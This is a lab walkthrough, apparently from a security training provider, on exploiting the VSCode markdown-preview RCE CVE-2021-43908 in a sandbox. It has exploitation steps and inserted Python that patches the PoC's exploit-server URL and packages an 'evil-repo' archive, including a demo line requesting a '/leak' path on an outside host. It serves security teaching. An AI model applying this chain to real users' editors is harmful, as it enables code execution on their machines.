    21 November 22

    [CVE-2021-43908] VSCode RCE

    Posted by INE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Technical difficulty: Beginner

    Introduction

    During the last quarter of 2021, an interesting RCE vulnerability affecting VSCode was made public. The vulnerability could be triggered even when a folder was opened in the Restricted Mode provided by VSCode. It was assigned the CVE ID CVE-2021-43908 and was patched in the November 2021 release of VSCode (version 1.63).  

    This bug was discovered by the researchers going by the aliases TheGrandPew and s1r1us. The researchers have documented their research in [this blog post](https://blog.electrovolt.io/posts/vscode-rce/), covering the complete attack chain to trigger this RCE vulnerability!  

    The gist of the vulnerability, as stated by the authors, is:  

    Remote Code execution can be achieved when a victim opens a markdown file in a maliciously crafted VSCode Project or a folder even in VSCode Restricted Mode. 

    In this lab, we will learn to exploit the RCE vulnerability in VSCode by opening a malicious project sent by the attacker to the victim user.  

    Lab Environment

    In this lab environment, the user is going to get access to a Kali GUI instance along with two sessions to a Windows machine with student and Administrator user accounts. The Windows machine is available on the following domain name: demo.ine.local  

    Objective: Exploit the RCE vulnerability affecting VSCode (CVE-2021-43908).  

    Note: During exploitation, you might need to relax the VSCode markdown preview settings to enable content loading over http served from localhost. This is not strictly necessary (the original research used a public HTTPS exploit server, so a real victim would not have to change anything), but it is the quick way to check the PoC for this RCE vulnerability. The other route, serving the exploit over HTTPS, is more involved and is mentioned in the solution for those interested in the practicalities of this attack.  

    Tools

    The best tools for this lab are:

    - Nmap

    - NodeJS

    - Python

    - Zip

    - A web browser

    - Visual Studio Code (or VSCode for short)

    Step 1: Open the lab link.  

    In this lab, we receive two machines, reached through three sessions:  

    1. Kali Machine: A Kali GUI instance containing the exploit server files and the malicious project files that when opened, trigger the VSCode RCE vulnerability.  

    vscode_rce_1.png

    2. Attacker Machine: A Windows machine with a student account used to start the exploit server and deliver the exploitation payload.  

    vscode_rce_1_1.png

    3. Target Machine: The same Windows machine as above with the Administrator account, used to simulate a victim where you would open a malicious project inside VSCode in restricted mode.  

    vscode_rce_1_2.png

    The Kali machine contains all the files relevant for exploitation, and the Windows student session is where we will run our exploit server. We will then open the malicious markdown file in VSCode on the same Windows machine, using the Administrator session as the victim.  

    The end goal would be to spawn a calculator instance.  

    Step 2: Check the availability of the target Windows machine.  

    The target Windows machine is located at the domain demo.ine.local:  

    Command:  

    ping -c3 demo.ine.local

    vscode_rce_2.png

    The target Windows machine is reachable.  

    Step 3: Scan the target Windows machine for open ports.  

    Command:  

    nmap -sS -sV demo.ine.local

    vscode_rce_3.png

    Step 4: Check the VSCode version in the Target Machine.  

    Navigate to the Target Machine:  

    vscode_rce_4.png

    Open VSCode from the taskbar:  

    vscode_rce_4_1.png

    Click on Help > About:  

    vscode_rce_4_2.png

    That would show a dialog box containing the VSCode version information:  

    vscode_rce_4_3.png

    Version: 1.61.0 (system setup)

    Commit: ee8c7def80afc00dd6e593ef12f37756d8f504ea

    Date: 2021-10-07T18:13:09.652Z

    Electron: 13.5.1

    Chrome: 91.0.4472.164

    Node.js: 14.16.0

    V8: 9.1.269.39-electron.0

    OS: Windows_NT x64 10.0.17763

    The VSCode version seems quite old - it was last updated almost a year ago, as of this writing!  

    Step 5: Search for information on VSCode RCE CVE-2021-43908.  

    Search Query:  

    VSCode RCE CVE-2021-43908

    vscode_rce_5.png

    Open the ElectroVolt.io blog page:  

    URL: https://blog.electrovolt.io/posts/vscode-rce/  

    Note: Read the researchers' original post first to understand the complete attack chain, then use this lab as a supplement to try their research firsthand. To avoid repetition, this manual is kept short and covers only the exploitation of the vulnerability.  

    vscode_rce_5_1.png

    Notice the summary of the vulnerability:  

    Remote Code execution can be achieved when a victim opens a markdown file in a maliciously crafted VSCode Project or a folder even in VSCode Restricted Mode.

    Navigate back to the search results:  

    1.png

    Open the MSRC portal page:  

    URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43908  

    Open the Release Notes:  

    vscode_rce_5_3.png

    URL: https://code.visualstudio.com/updates/v1_63  

    Notice that this page states the VSCode version in which the vulnerability was fixed:  

    vscode_rce_5_4.png

    The patched version was: November 2021 (version 1.63).  

    This means the provided VSCode version (1.61.0) is vulnerable to the aforementioned RCE vulnerability.  
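Version comparison is the one check worth scripting here: Step 4 read the version from the About dialog by hand, and a triage script that does the same for a fleet of workstations is easy to get wrong (string comparison puts "1.9.0" after "1.63.0"). The following is an added example, not part of the lab or the upstream PoC; it takes the fixed release from the page's release-notes reference (1.63) and parses either the About dialog text copied above or the first line of `code --version` output.

```python
"""Check whether a VS Code build predates the fix for CVE-2021-43908 (added example)."""
import re

# The page's release-notes reference gives the fixed release as November 2021, version 1.63.
FIXED_IN = (1, 63, 0)

# Text copied from the lab's Help > About dialog (Step 4 of the page).
ABOUT_TEXT = """Version: 1.61.0 (system setup)
Commit: ee8c7def80afc00dd6e593ef12f37756d8f504ea
Date: 2021-10-07T18:13:09.652Z
Electron: 13.5.1
Chrome: 91.0.4472.164
Node.js: 14.16.0
V8: 9.1.269.39-electron.0
OS: Windows_NT x64 10.0.17763"""


def parse_version(text: str) -> tuple:
    """Pull x.y.z out of either the About dialog ('Version: 1.61.0 (system setup)')
    or the first line of `code --version` output ('1.61.0'). Pre-release suffixes
    such as '-insider' are ignored; only the numeric triple matters for this check."""
    m = re.search(r"(?:^|Version:\s*)(\d+)\.(\d+)\.(\d+)", text, re.MULTILINE)
    if not m:
        raise ValueError("no VS Code version string found")
    return tuple(int(g) for g in m.groups())


def is_vulnerable(version: tuple, fixed: tuple = FIXED_IN) -> bool:
    """Tuple comparison, not string comparison: '1.9.0' < '1.63.0' is False as strings
    but True as versions, which is exactly the mistake a naive check would make."""
    return version < fixed


def assess(text: str) -> dict:
    """Summarise one About/--version dump for an inventory or a quick triage script."""
    v = parse_version(text)
    return {
        "version": ".".join(map(str, v)),
        "vulnerable": is_vulnerable(v),
        "fixed_in": ".".join(map(str, FIXED_IN)),
    }


if __name__ == "__main__":
    print(assess(ABOUT_TEXT))  # the lab build: 1.61.0, vulnerable
```

On Windows the same data comes from `code --version` in a PowerShell prompt; feed its output to `assess()` and treat anything below 1.63.0 as exposed. The threshold is the page's figure; if your patch-management source lists a point release, adjust `FIXED_IN` accordingly.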

    Step 6: Inspect the provided exploitation files.  

    The exploit PoC is referenced from the following GitHub repository:  

    URL: https://github.com/Sudistark/vscode-rce-electrovolt/  

    vscode_rce_6.png

    The exploit files are provided in the challenge-files directory located on the Desktop:  

    Commands:  

    ls -al ~/Desktop/challenge-files/

    ls -al ~/Desktop/challenge-files/vscode-rce-poc/

    vscode_rce_6_1.png

    The exploit.md file initiates the complete exploitation chain: when it is rendered, it sends a request to the attacker's server, which leaks the extension ID and returns the payload.  

    The rce.html file contains the JS payload to open a calculator app.  

    The code directory contains the code run by the attacker to steal the extension ID and send the payload to the VSCode app.  

    Command:  

    ls -al ~/Desktop/challenge-files/vscode-rce-poc/code/

    2.png

    Navigate to the directory of the provided files and check the provided VSCode settings file:  

    Commands:  

    cd ~/Desktop/challenge-files/vscode-rce-poc/

    ls -al

    cat .vscode/Settings.json

    vscode_rce_6_3.png

    Remove the highlighted line from the settings file with an editor of your choice, then confirm the change:  

    Command:  

    cat .vscode/Settings.json

    vscode-rce-6_4.png

    Step 7: Alter the IP address and paths in the exploitation files and package the zip archives for the target Windows machine.  

    Check the contents of the exploit.md and rce.html files:  

    Commands:  

    cat exploit.md

    cat rce.html

    3.png

    Notice the highlighted URL:  

    URL: https://felineintelligentbytes.kacegi6947.repl.co/  

    We have to change this, as public URLs are not reachable from the lab instance. We replace it with http://localhost:3000, since the exploit server will run locally on the target Windows machine under the low-privileged student account. Serving over plain HTTP from localhost is also why the markdown preview will later need its insecure-local-content setting relaxed.  

    Check the contents of the code/main.js file:  

    Command:  

    cat code/main.js

    vscode_rce_7_1.png

    vscode_rce_7_2.png

    We need to modify the URL and the installation path of the VSCode.  

    The installation path for VSCode can be found from the Windows machine:  

    vscode-rce-7_3.png

    vscode-rce-7_4.png

    Installation Path:  

    C:\Program Files\Microsoft VS Code\resources\app

    Replace each backslash (\\) with a forward slash (/) and percent-encode the spaces (as %20), since the path is embedded in a URL:  

    Installation Path:  

    C:/Program%20Files/Microsoft%20VS%20Code/resources/app

    Now we can place this value in the code/main.js file.  

    After URL and VSCode installation path modifications, the exploit.md and code/main.js files should look like this:  

    Command:  

    cat exploit.md

    vscode-rce-7_5.png

    Command:  

    cat code/main.js

    vscode-rce-7_6.png

    vscode-rce-7_7.png

    Archive the exploit files to be opened in VSCode:  

    Commands:  

    zip -r evil-repo.zip exploit.md rce.html .vscode

    unzip -t evil-repo.zip

    vscode-rce-7_8.png

    Archive the exploit files run by the attacker (student user in this case):  

    Command:  

    zip -r exploit-code.zip code

    vscode_rce_7_9.png
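Step 7 is the part of this lab that is easiest to get wrong: a missed URL leaves the public repl.co host in a file, a bare `zip -r *` skips the hidden `.vscode` folder, and the install path has to be converted by hand. The script below is an added example (not from the lab or the upstream repository) that does the same edits and builds the same two archives. It assumes the upstream URL shown on the page and a `code/main.js` layout; the original path literal inside `main.js` is not reproduced on the page, so `package()` takes it as a parameter you copy from `cat code/main.js`. `demo()` runs the whole thing against a constructed stand-in tree, not the real PoC files.

```python
"""Step 7 automated: patch the PoC's URL and install path, then build the two archives.
Added example, not part of the lab files or the upstream repository."""
import tempfile
import zipfile
from pathlib import Path
from urllib.parse import quote

# Public exploit server hard-coded upstream (shown on the page) and its lab replacement.
UPSTREAM_URL = "https://felineintelligentbytes.kacegi6947.repl.co"
LOCAL_URL = "http://localhost:3000"


def to_url_path(win_path: str) -> str:
    """Windows path -> form embedded in a URL: '\\' becomes '/', spaces (and anything
    else unsafe) are percent-encoded. safe='/:' keeps the drive colon and separators."""
    return quote(win_path.replace("\\", "/"), safe="/:")


def patch_files(root: Path, replacements: dict,
                files=("exploit.md", "rce.html", "code/main.js")) -> dict:
    """Literal search/replace across the PoC files. Returns {file: substitutions}, so a
    0 next to exploit.md means the public URL is still there and the zip must not ship."""
    report = {}
    for rel in files:
        p = root / rel
        if not p.is_file():
            continue
        text = p.read_text(encoding="utf-8")
        hits = 0
        for old, new in replacements.items():
            hits += text.count(old)
            text = text.replace(old, new)
        p.write_text(text, encoding="utf-8")
        report[rel] = hits
    return report


def build_zip(root: Path, out: Path, members) -> list:
    """Archive files/directories relative to root, dot-directories included (a shell
    glob such as `zip -r evil-repo.zip *` would skip .vscode). Returns the member list."""
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        for m in members:
            p = root / m
            files = [p] if p.is_file() else sorted(q for q in p.rglob("*") if q.is_file())
            for q in files:
                zf.write(q, q.relative_to(root).as_posix())
    with zipfile.ZipFile(out) as zf:
        return zf.namelist()


def package(root: Path, vscode_install: str, old_path_literal: str) -> dict:
    """`old_path_literal` is the install-path string currently inside code/main.js;
    the page does not reproduce it, so copy it from `cat code/main.js`."""
    replacements = {UPSTREAM_URL: LOCAL_URL}
    if old_path_literal:
        replacements[old_path_literal] = to_url_path(vscode_install)
    return {
        "substitutions": patch_files(root, replacements),
        "evil-repo.zip": build_zip(root, root / "evil-repo.zip",
                                   ["exploit.md", "rce.html", ".vscode"]),
        "exploit-code.zip": build_zip(root, root / "exploit-code.zip", ["code"]),
    }


def demo() -> dict:
    """Run against a constructed stand-in for the PoC tree (not the real files)."""
    root = Path(tempfile.mkdtemp())
    (root / ".vscode").mkdir()
    (root / "code").mkdir()
    (root / "exploit.md").write_text(f"<img src='{UPSTREAM_URL}/leak'>\n", encoding="utf-8")
    (root / "rce.html").write_text("<script>/* constructed placeholder */</script>\n",
                                   encoding="utf-8")
    (root / "code" / "main.js").write_text(
        f'const server = "{UPSTREAM_URL}";\nconst app = "C:/PLACEHOLDER/resources/app";\n',
        encoding="utf-8")
    (root / ".vscode" / "settings.json").write_text("{}\n", encoding="utf-8")
    result = package(root, r"C:\Program Files\Microsoft VS Code\resources\app",
                     "C:/PLACEHOLDER/resources/app")
    result["main.js"] = (root / "code" / "main.js").read_text(encoding="utf-8")
    return result


if __name__ == "__main__":
    print(demo())
```

Run it from `~/Desktop/challenge-files/vscode-rce-poc/` with `package(Path("."), r"C:\Program Files\Microsoft VS Code\resources\app", "<path literal from main.js>")` and check the substitution counts before serving the archives; the two zip member lists should match what `unzip -t` printed in the manual steps.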

    Step 8: Transfer the exploitation files to the target Windows machine and exploit the VSCode app.  

    Check the IP address of the Kali GUI instance:  

    Command:  

    ip addr

    4.png

    The IP address of the Kali GUI instance is 10.10.27.2.  

    Note: The IP address of your Kali GUI instance would be different, so make sure to check its IP and use that to download the files to the target Windows machine!  

    Start a Python-based HTTP server to transfer files to the Windows machine:  

    Command:  

    python3 -m http.server 80

    vscode_rce_8_1.png

    Open the Firefox browser in the Attacker Machine and open the following URL:  

    URL: http://10.10.27.2  

    Note: Substitute the IP address of your own Kali GUI instance.  

    Download the exploit-code.zip file.  

    5.png

    Extract the downloaded file:  

    vscode-rce-8_3.png

    vscode-rce-8_4.png

    Navigate to the extracted folder and start the exploit server:  

    Commands:  

    cd .\Downloads\exploit-code\code\

    ls

    node .\main.js

    vscode-rce-8_5.png

    The exploit server has started and listens on port 3000 on the Windows machine.  

    Notice that we have used the student account to launch the exploit server.  

    Head over to the Target Machine and open the following URL in the Firefox browser:  

    URL: http://10.10.27.2   

    Note: Substitute the IP address of your own Kali GUI instance.  

    Download the evil-repo.zip file.  

    vscode_rce_8_6.png

    Extract the downloaded file:  

    vscode-rce-8_7.png

    vscode_rce_8_8.png

    Open the extracted folder in VSCode:  

    vscode_rce_8_9.png

    vscode-rce-8_10.png

    Select No, I don't trust the authors to open this folder in restricted mode:  

    vscode-rce-8_11.png

    Open exploit.md file:  

    vscode_rce_8_12.png

    Recall the .vscode/Settings.json file. It contained an entry for \*.md files which, in essence, makes VSCode open all markdown files in preview mode by default.  

    So opening the exploit.md file would show the markdown preview:  

    vscode_rce_8_13.png
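For reference, the workspace setting that opens every markdown file straight into its preview is `workbench.editorAssociations`. The page does not reproduce the PoC's settings file, so the following is an added illustration of that setting, not the lab's Settings.json; the PoC's file may carry further keys (the line removed in Step 6 among them).

```json
{
  "workbench.editorAssociations": {
    "*.md": "vscode.markdown.preview.editor"
  }
}
```

The security-relevant point is that this is a workspace setting shipped inside the attacker-controlled .vscode folder, and in the 1.61 build used here it still took effect after choosing "No, I don't trust the authors", which is what makes the preview (and with it the exploit) fire as soon as the file is opened. Reading .vscode/settings.json before opening anything in an untrusted checkout is a cheap habit that would have surfaced this.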

    On the right side, you can see Some content has been disabled in this document.  

    Click on that warning and select Allow insecure local content (Enable content loading over http served from localhost).  

    vscode-rce-8_14.png

    Why have we done so?  

    By default, the markdown preview treats only content loaded over HTTPS as secure; because we serve the exploit over plain HTTP from localhost, VSCode blocks it and shows this warning. To reproduce the issue and see how VSCode can be leveraged to pop a calculator, we relax this setting. The alternative would be to host the NodeJS exploit server over HTTPS, which requires a certificate the VSCode app trusts. Keep in mind that this relaxation is a lab convenience only: the original research used a public HTTPS host, so a real victim would not need to change any setting.  

    Once we have relaxed the security for localhost, the markdown file gets rendered, and the exploitation starts:  

    vscode-rce-8_15.png

    Note: You might see an error such as htmlPOC is not defined in the window where the NodeJS exploit server is running. That happens because VSCode did not yet trust localhost over HTTP when the request was made. If exploitation still fails after relaxing the VSCode security setting, restart the NodeJS exploit server.  

    After a few seconds (3 to be precise), you should see an iframe:  

    vscode-rce-8_16.png

    Soon after that, a calculator would pop up:  

    vscode-rce-8_17.png

    Open the Attacker Machine where the exploit server was running:  

    vscode-rce-8_18.png

    Notice that the server received the leaked extension ID; that is what allowed the exploit to proceed.  

    If you let the server run and keep the exploit.md file open, you would notice that the calculator keeps popping up as the exploit never stops.  

    Stop the exploit server by pressing CTRL+C to avoid multiple calculator instances from being popped up.  

    vscode_rce_8_19.png

    Navigate back to the Target Machine and press CTRL+P:  

    Type the following in the input box that shows up:  

    >developer: open webview

    vscode-rce-8_20.png

    Select the only entry that shows up; this opens the browser-like developer tools console for the webview:  

    vscode-rce-8_21.png

    This window would help inspect the exploit in action.  

    Now restart the exploit server on the Attacker Machine:  

    6.png

    Head back to the Target Machine and reopen (close and open) the exploit.md file.  

    Notice the requests made to the exploit server to steal the extension ID:  

    7.png

    Next, the iframe is opened:  

    8.png

    Next, rce.html is loaded and pops up a calculator instance:  

    9.png

    If you keep the exploit server running and the exploit.md file open, you will notice that calculator instances keep popping up:  

    10.png

    You can also dig deeper by checking the Network tab, or by setting breakpoints and stepping through the exploit to see how it works.  

    With that, we conclude this lab on VSCode RCE (CVE-2021-43908).  

    References

    Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908): https://blog.electrovolt.io/posts/vscode-rce/

    Visual Studio Code Spoofing Vulnerability: CVE-2021-43908 (MSRC): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43908

    VSCode Updates: November 2021 (version 1.63): https://code.visualstudio.com/updates/v1_63

    PoC: vscode-rce-electrovolt: https://github.com/Sudistark/vscode-rce-electrovolt/


    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.